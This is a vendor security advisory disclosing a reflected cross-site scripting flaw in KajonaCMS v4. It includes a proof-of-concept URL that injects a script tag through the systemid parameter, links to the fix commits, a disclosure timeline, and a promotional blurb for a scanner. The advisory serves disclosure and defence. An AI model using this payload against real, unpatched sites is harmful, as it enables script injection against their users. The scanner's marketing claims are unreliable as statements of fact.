XSS Vulnerability in KajonaCMS
Information
Advisory by Netsparker (now Invicti)
Name: XSS Vulnerability in KajonaCMS
Software: KajonaCMS v4 and possibly below.
Vendor Homepage: http://www.kajona.de/
Vulnerability Type: Cross-site Scripting
Severity: Critical
Researcher: Omar Kurt
Advisory Reference: NS-14-023
Description
Kajona is a content management framework based on PHP5 and published as an open-source project under the LGPL license. The roots of the project are going back to 2004 as collected programming solutions where combined into a library. The idea of a web content management framework was born – followed by version 2.0 in 2005 and 2.1 in the beginning of 2006. Version 3.0 was published with a complete code rewrite in 2006.
Details
KajonaCMS is affected by XSS vulnerability in version v4.
KajonaCMS PoC urls are as follows:
- Cross-site Scripting
http://example.com/index.php?page=downloads&systemid=';"--></style></scRipt><scRipt>alert(0x0001EE)</scRipt>&action=mediaFolder(Querystring)
Learn more about Cross-site Scripting vulnerabilities:
Solution
https://github.com/kajona/kajonacms/commit/8f1b18150cc2a8f27c96d9c4f94a81022fbb61e3
https://github.com/kajona/kajonacms/commit/4a07f949c171da6aa9a6e6c19421b0df16297180
Advisory Timeline
05/06/2014 – First Contact
07/06/2014 – Second Contact
08/06/2014 – Vulnerability fixed
23/06/2014 – Advisory released
Credits
It has been discovered on testing of Invicti Web Application Security Scanner.
About Invicti
Invicti® can find and report security issues such as SQL Injection and Cross-site Scripting (XSS) in all web applications regardless of the platform and the technology they are built on. Invicti’s unique detection and exploitation techniques allows it to be dead accurate in reporting hence it’s the first and the only False Positive Free web application security scanner.
